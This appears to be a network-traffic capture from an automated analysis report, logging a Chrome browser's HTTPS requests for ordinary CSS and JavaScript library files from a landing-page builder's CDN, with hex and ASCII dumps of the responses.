                                                                2025-04-09 00:18:34 UTC16384INData Raw: 50 d4 5a c5 99 c7 1b 35 47 e5 82 7b 7a 56 77 ec 23 c1 1d ce 0c 92 6c 25 24 30 1c 40 a5 f5 f9 99 b0 3a f9 d0 32 f4 2e dc f8 37 b4 12 8f c1 90 51 28 da e9 32 c8 71 19 fb 06 3f 66 12 ec 22 37 1b c2 52 6d 3a 3c c9 f6 86 2f f0 95 18 c3 bc 69 9d 6d 71 e5 87 d0 61 f0 73 27 56 6b bb da 82 93 f5 e1 9a e9 70 bc 76 3c 9c ad 7d 1e ba c3 9c b5 4c dc 5d b7 c7 5f f0 55 36 9f f1 80 26 18 3a 17 65 84 a7 0d d2 11 fc 24 fe 7a 51 03 5e 5b 8f 65 7c 4e 1f bf 16 5a ce be 4f 28 51 24 53 de d6 3f 11 5e 8f d9 47 fc 6e 74 d7 77 01 f2 f4 07 51 ef d0 f6 7c 02 3e 6d 63 71 ee 63 d3 26 4b 48 27 41 42 99 77 5d c8 cb 01 30 90 82 58 29 fc 3d e0 1f c1 70 0c 1d a6 a3 fc 9a c3 47 90 90 73 6d 03 0b b6 f6 ab 1f 9b b3 75 8a ec e3 75 4d ed a5 e9 5f d0 fe de a6 c9 fe b7 c2 02 5a 99 ad 97 1f 13 f9
                                                                Data Ascii: PZ5G{zVw#l%$0@:2.7Q(2q?f"7Rm:</imqas'Vkpv<}L]_U6&:e$zQ^[e|NZO(Q$S?^GntwQ|>mcqc&KH'ABw]0X)=pGsmuuM_Z
                                                                2025-04-09 00:18:34 UTC16384INData Raw: aa e7 b4 35 5f f9 73 ab c7 86 b9 86 c8 45 32 b9 10 a0 1c 6d c2 99 93 2c a9 3f df 85 f1 e7 ba 57 77 1b f4 d7 84 c3 9d ad b5 23 41 1e 89 21 9c ad d9 91 90 03 7c 30 69 cb 96 58 42 fc 55 49 08 c9 04 ab da 7d 24 d8 91 20 03 74 23 bb 32 35 ad 44 7b d9 4b fc 13 7a 85 fd 27 84 25 d0 4e 58 8b e6 81 a2 51 b6 b9 98 f4 4b 25 a3 bf c3 10 24 84 4a 10 d7 c0 5f 18 7f 46 f8 d7 df e0 23 41 1e 89 61 14 89 c9 51 37 c9 09 3b 12 a1 96 49 2b 53 2d b3 92 e3 b7 b2 bf 1c 8a 84 c3 8b 17 38 ce c3 db ba 15 2f f8 29 e7 ab e8 af 8b f1 09 bd 5f 12 f9 a7 c0 92 c3 0f 13 e7 4a 42 09 2b 9b 73 fd d1 0b 98 f2 fc 29 89 e6 30 15 ac 27 06 bc 16 25 54 7f a1 57 10 ff c2 f4 f7 97 a0 8f bf 92 bc af ba 73 41 d4 0e 9f 9b f4 7f ec 3a 66 64 3a 48 d4 a6 09 7c 24 d4 bf 65 08 79 9d 59 c4 b4 09 3a 27 65 04
                                                                Data Ascii: 5_sE2m,?Ww#A!|0iXBUI}$ t#25D{Kz'%NXQK%$J_F#AaQ7;I+S-8/)_JB+s)0'%TWsA:fd:H|$eyY:'e
                                                                2025-04-09 00:18:34 UTC16384INData Raw: 60 b2 f7 08 a7 78 d1 59 72 27 51 16 65 03 fd fd 07 bf 98 e0 46 59 3f 89 02 f1 c9 f7 df b5 33 4c 70 25 cb 52 30 fc 81 35 e3 df c8 d8 a4 dd c0 a4 49 3e 2d 6a 33 a3 ac 58 cb 39 de 23 3e 69 01 0f c2 f9 fc cb 5f 16 9c c8 3f da 88 da 8a ea 90 22 9a 57 1b c9 0b 0f a1 14 2a d7 84 b2 c5 77 29 c9 23 4a 46 2d 4a b9 e7 21 61 32 aa 05 41 8d c9 a1 22 59 76 96 b4 fd 17 cb 7f d1 4d e1 8f 17 68 27 53 64 74 7f 8e af d0 2d cc f1 14 f9 4d 26 65 33 98 34 79 16 6f c7 30 a9 73 1e fe 92 28 fe cb 74 ec 1c 91 9a ce 33 d1 56 0e 89 4e 16 20 fc 08 8f ee 3b f9 93 82 a4 a8 4d 32 6d 92 0f 88 e7 91 60 b1 59 be 2d 92 9f 3c f6 38 9b 34 ec a5 90 07 85 14 fe e4 07 28 12 44 b8 2b c7 f8 2b d8 0e 3f 50 2f 7c ee a2 fd 07 1f 89 58 98 04 d8 27 2a fa 1d 79 99 5c 73 a0 02 a4 27 b8 27 84 d5 88 f4 ed
                                                                Data Ascii: `xYr'QeFY?3Lp%R05I>-j3X9#>i_?"W*w)#JF-J!a2A"YvMh'Sdt-M&e34yo0s(t3VN ;M2m`Y-<84(D++?P/|X'*y\s''
                                                                2025-04-09 00:18:34 UTC2115INData Raw: 20 4e 2c 06 b6 12 9b 2d 8a 2b fe 2b fd 31 4e 5a ca 48 b2 68 89 23 49 45 ca a9 e3 af f2 9f ca 7f 19 08 0c 0d a7 94 3a ff d4 f9 b7 ca 1f 55 fe 72 a6 0c 86 c0 0c 59 e5 cf e1 c9 df 91 90 4e b1 23 44 11 99 ae f2 bc c8 16 d1 9c a9 38 28 df bb b1 ca 85 38 8f db f1 44 cf 64 cd ef 7c af bd 9b df 0a 34 b9 e1 52 7e f3 50 67 35 31 a4 1d df aa f0 03 0b 7c 54 fc b7 74 54 e9 af 8e bf ca 7f 2a ff ad f3 4f 9d 7f ab fc 51 e5 2f 85 23 64 03 05 a5 72 84 f8 18 1f 71 ab ca 9f 2d 62 7a be 45 cf 23 91 bf 97 ca 8e 44 74 50 bb 15 ba a6 22 e1 1c 5d 24 5c 57 b9 ac dc 83 5d e7 0d 7a d9 8e f6 81 d2 e1 f9 d3 0b 6c 3e 53 46 6c 46 f0 ab f7 88 c7 7d b0 c2 ef e0 ad c5 4f e2 06 e4 54 fc 07 6e 2a fd e5 f0 ea 1b 64 41 2c 50 4a 1d 7f 95 ff 24 c3 ed f0 91 ca 7f 1d 29 75 fe a9 f3 6f 95 3f aa fc
                                                                Data Ascii: N,-++1NZHh#IE:UrYN#D8(8Dd|4R~Pg51|TtT*OQ/#drq-bzE#DtP"]$\W]zl>SFlF}OTn*dA,PJ$)uo?


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.54971179.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC637OUTGET /LPStaticResources/fancybox/source/jquery.fancybox.css?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: text/css,*/*;q=0.1
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: style
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC437INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: text/css
                                                                Content-Length: 3909
                                                                Connection: close
                                                                Last-Modified: Wed, 09 May 2018 18:17:45 GMT
                                                                ETag: "ca4077c2e7d31:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBCAFZu7EMAYE
                                                                X-77-NZT-Ray: f03d0613946a63abdabcf5677c92b008
                                                                X-77-Cache: MISS
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:34 UTC3909INData Raw: 2f 2a 21 20 66 61 6e 63 79 42 6f 78 20 76 32 2e 31 2e 35 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 20 7c 20 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 2f 66 61 6e 63 79 62 6f 78 2f 23 6c 69 63 65 6e 73 65 20 2a 2f 2e 66 61 6e 63 79 62 6f 78 2d 77 72 61 70 2c 2e 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 2c 2e 66 61 6e 63 79 62 6f 78 2d 6f 75 74 65 72 2c 2e 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 2c 2e 66 61 6e 63 79 62 6f 78 2d 69 6d 61 67 65 2c 2e 66 61 6e 63 79 62 6f 78 2d 77 72 61 70 20 69 66 72 61 6d 65 2c 2e 66 61 6e 63 79 62 6f 78 2d 77 72 61 70 20 6f 62 6a 65 63 74 2c 2e 66 61 6e 63 79 62 6f 78 2d 6e 61 76 2c 2e 66 61 6e 63 79 62 6f 78 2d 6e 61 76 20 73 70 61 6e 2c 2e 66 61 6e 63 79 62 6f 78 2d 74 6d 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e
                                                                Data Ascii: /*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */.fancybox-wrap,.fancybox-skin,.fancybox-outer,.fancybox-inner,.fancybox-image,.fancybox-wrap iframe,.fancybox-wrap object,.fancybox-nav,.fancybox-nav span,.fancybox-tmp{padding:0;margin


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.54970879.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC624OUTGET /LPStaticResources/style2/sweet-alert.css?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: text/css,*/*;q=0.1
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: style
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC462INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: text/css
                                                                Content-Length: 10861
                                                                Connection: close
                                                                Last-Modified: Sun, 06 May 2018 12:38:36 GMT
                                                                ETag: "8f29f92637e5d31:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAGckjvfAZeOrgIA
                                                                X-77-NZT-Ray: f03d0613549174abdabcf5677ba8cd08
                                                                X-77-Cache: HIT
                                                                X-77-Age: 175758
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:34 UTC10861INData Raw: 40 69 6d 70 6f 72 74 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 2c 37 30 30 2c 33 30 30 29 3b 2e 73 77 65 65 74 2d 6f 76 65 72 6c 61 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 2e 73 77 65 65 74 2d 61 6c 65 72 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4f 70 65 6e 20 53 61 6e 73 27 2c 73 61 6e
                                                                Data Ascii: @import url(//fonts.googleapis.com/css?family=Open+Sans:400,600,700,300);.sweet-overlay{background-color:rgba(0,0,0,0.4);position:fixed;left:0;right:0;top:0;bottom:0;display:none;z-index:1000}.sweet-alert{background-color:white;font-family:'Open Sans',san


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.54971379.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC621OUTGET /LPStaticResources/style2/lpCommon.css?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: text/css,*/*;q=0.1
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: style
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC458INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: text/css
                                                                Content-Length: 17929
                                                                Connection: close
                                                                Last-Modified: Thu, 18 Jan 2024 12:27:39 GMT
                                                                ETag: "4101ba94ada1:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAGckjviAbfvQAAA
                                                                X-77-NZT-Ray: f03d0613d2a664abdabcf567900ecf08
                                                                X-77-Cache: HIT
                                                                X-77-Age: 16623
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:34 UTC15926INData Raw: ef bb bf 20 23 66 72 6d 70 6f 73 74 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 7d 69 66 72 61 6d 65 5b 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 5f 63 6f 6e 76 65 72 73 69 6f 6e 5f 66 72 61 6d 65 27 5d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 7d 2e 64 72 61 67 67 61 62 6c 65 5b 65 74 79 70 65 3d 22 48 65 61 64 6c 69 6e 65 22 5d 2c 2e 64 72 61 67 67 61 62 6c 65 2e 48 65 61 64 6c 69 6e 65
                                                                Data Ascii: #frmpost{border-width:0}iframe[name='google_conversion_frame']{position:absolute}input,select,textarea{box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box}a img{border-width:0}.draggable[etype="Headline"],.draggable.Headline
                                                                2025-04-09 00:18:34 UTC2003INData Raw: 73 73 2d 73 74 79 6c 65 2d 69 6e 63 7a 69 67 7a 61 67 3a 3a 61 66 74 65 72 7b 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 30 20 30 2c 31 30 25 20 31 30 30 25 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 30 2e 35 2c 23 33 34 39 38 64 62 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 30 2e 35 2c 23 32 39 38 30 62 39 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 35 64 65 67 2c 23 32 39 38 30 62 39 20 35 30 25 2c 23 33 34 39 38 64 62 20 35 30 25 29 7d 2e 73 73 2d 73 74 79 6c 65 2d 63 61 73 74 6c 65 3a 3a 62 65 66 6f 72 65 7b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 35 30 70
                                                                Data Ascii: ss-style-inczigzag::after{bottom:0;background-image:-webkit-gradient(linear,0 0,10% 100%,color-stop(0.5,#3498db),color-stop(0.5,#2980b9));background-image:linear-gradient(15deg,#2980b9 50%,#3498db 50%)}.ss-style-castle::before{left:0;width:100%;height:50p


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.54971079.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC626OUTGET /LPStaticResources/style2/bootstrap.min.css?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: text/css,*/*;q=0.1
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: style
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC462INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: text/css
                                                                Content-Length: 16349
                                                                Connection: close
                                                                Last-Modified: Sun, 06 May 2018 12:38:36 GMT
                                                                ETag: "4536dd2637e5d31:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAFZu7EYAZcLrQQA
                                                                X-77-NZT-Ray: f03d0613a85c88abdabcf56793eb1509
                                                                X-77-Cache: HIT
                                                                X-77-Age: 306443
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:34 UTC15922INData Raw: 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 32 2e 30 2e 34 0d 0a 20 2a 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 32 20 54 77 69 74 74 65 72 2c 20 49 6e 63 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 4c 69 63 65 6e 73 65 20 76 32 2e 30 0d 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 61 63 68 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4c 49 43 45 4e 53 45 2d 32 2e 30 0d 0a 20 2a 0d 0a 20 2a 20 44 65 73 69 67 6e 65 64 20 61 6e 64 20 62 75 69 6c 74 20 77 69 74 68 20 61 6c 6c 20 74 68 65 20 6c 6f 76 65 20 69 6e 20 74 68 65 20 77 6f 72 6c 64 20 40 74 77 69 74 74 65 72 20 62 79 20 40 6d 64 6f 20 61 6e 64 20 40 66 61 74 2e 0d 0a 20 2a 2f 2e 63 6c 65 61 72 66 69 78 7b 2a 7a 6f 6f 6d
                                                                Data Ascii: /*! * Bootstrap v2.0.4 * * Copyright 2012 Twitter, Inc * Licensed under the Apache License v2.0 * http://www.apache.org/licenses/LICENSE-2.0 * * Designed and built with all the love in the world @twitter by @mdo and @fat. */.clearfix{*zoom
                                                                2025-04-09 00:18:34 UTC427INData Raw: 67 68 74 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 68 65 69 67 68 74 20 2e 33 35 73 20 65 61 73 65 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 68 65 69 67 68 74 20 2e 33 35 73 20 65 61 73 65 3b 2d 6d 73 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 68 65 69 67 68 74 20 2e 33 35 73 20 65 61 73 65 3b 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 68 65 69 67 68 74 20 2e 33 35 73 20 65 61 73 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 68 65 69 67 68 74 20 2e 33 35 73 20 65 61 73 65 7d 2e 63 6f 6c 6c 61 70 73 65 2e 69 6e 7b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 6d 6f 64 61 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 63 6f 6c 6f 72 3a 23 33
                                                                Data Ascii: ght:0;overflow:hidden;-webkit-transition:height .35s ease;-moz-transition:height .35s ease;-ms-transition:height .35s ease;-o-transition:height .35s ease;transition:height .35s ease}.collapse.in{height:auto}.modal{font-family:arial;font-size:12px;color:#3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.54970979.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC608OUTGET /LPStaticResources/lpFormValidations.js?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC474INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: application/javascript
                                                                Content-Length: 21430
                                                                Connection: close
                                                                Last-Modified: Sun, 06 Jun 2021 18:21:36 GMT
                                                                ETag: "0b8efc805bd71:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAFZu7EYAbdlJAsA
                                                                X-77-NZT-Ray: f03d06136f6773abdabcf5676036d608
                                                                X-77-Cache: HIT
                                                                X-77-Age: 730213
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:34 UTC15910INData Raw: 76 61 72 20 6a 73 6f 6e 46 6f 72 6d 46 69 65 6c 64 73 2c 4b 65 79 56 61 6c 75 65 46 6f 72 6d 46 69 65 6c 64 73 2c 43 6f 6e 76 65 72 73 69 6f 6e 55 52 4c 3b 66 75 6e 63 74 69 6f 6e 20 75 70 64 61 74 65 55 49 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 70 77 49 6e 69 74 28 29 7b 74 72 79 7b 6a 73 6f 6e 46 6f 72 6d 46 69 65 6c 64 73 3d 67 65 74 43 6f 6f 6b 69 65 28 22 46 6f 72 6d 46 69 65 6c 64 73 22 29 7d 63 61 74 63 68 28 65 72 72 29 7b 72 65 74 75 72 6e 7d 69 66 28 6e 75 6c 6c 21 3d 6a 73 6f 6e 46 6f 72 6d 46 69 65 6c 64 73 29 74 72 79 7b 6a 73 6f 6e 46 6f 72 6d 46 69 65 6c 64 73 3d 24 2e 65 76 61 6c 4a 53 4f 4e 28 6a 73 6f 6e 46 6f 72 6d 46 69 65 6c 64 73 2e 72 65 70 6c 61 63 65 28 2f 6a 73 6f 6e 46 6f 72 6d 46 69 65 6c 64 73 3d 2f 2c 22 22 29 29 7d 63 61 74
                                                                Data Ascii: var jsonFormFields,KeyValueFormFields,ConversionURL;function updateUI(){}function pwInit(){try{jsonFormFields=getCookie("FormFields")}catch(err){return}if(null!=jsonFormFields)try{jsonFormFields=$.evalJSON(jsonFormFields.replace(/jsonFormFields=/,""))}cat
                                                                2025-04-09 00:18:34 UTC5520INData Raw: 6f 6e 22 29 2c 24 28 64 75 70 6c 69 63 61 74 65 64 53 65 63 74 69 6f 6e 29 2e 61 64 64 43 6c 61 73 73 28 22 73 65 63 74 69 6f 6e 2d 66 69 78 65 64 20 66 69 78 65 64 2d 62 6f 74 74 6f 6d 22 29 2c 24 28 64 75 70 6c 69 63 61 74 65 64 53 65 63 74 69 6f 6e 29 2e 66 69 6e 64 28 22 2e 73 65 63 74 69 6f 6e 2d 63 65 6e 74 65 72 65 64 22 29 2e 72 65 6d 6f 76 65 28 29 3b 76 61 72 20 74 6f 70 4d 6f 73 74 45 6c 65 6d 65 6e 74 5a 69 6e 64 65 78 3d 30 3b 24 2e 65 61 63 68 28 24 28 22 2e 73 65 63 74 69 6f 6e 2c 2e 73 65 63 74 69 6f 6e 2d 66 69 78 65 64 22 29 2c 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 65 63 74 69 6f 6e 29 7b 69 21 3d 24 28 22 2e 73 65 63 74 69 6f 6e 2c 2e 73 65 63 74 69 6f 6e 2d 66 69 78 65 64 22 29 2e 6c 65 6e 67 74 68 2d 31 26 26 28 73 65 63 74 69 6f 6e
                                                                Data Ascii: on"),$(duplicatedSection).addClass("section-fixed fixed-bottom"),$(duplicatedSection).find(".section-centered").remove();var topMostElementZindex=0;$.each($(".section,.section-fixed"),(function(i,section){i!=$(".section,.section-fixed").length-1&&(section


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.54971279.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC622OUTGET /LPStaticResources/fancybox/source/jquery.fancybox.js?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC476INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: application/javascript
                                                                Content-Length: 24269
                                                                Connection: close
                                                                Last-Modified: Wed, 09 May 2018 18:16:36 GMT
                                                                ETag: "e71719dec1e7d31:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAFZu7EMAbdiDQgA
                                                                X-77-NZT-Ray: f03d0613946a66abdabcf56732f4111a
                                                                X-77-Cache: HIT
                                                                X-77-Age: 527714
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
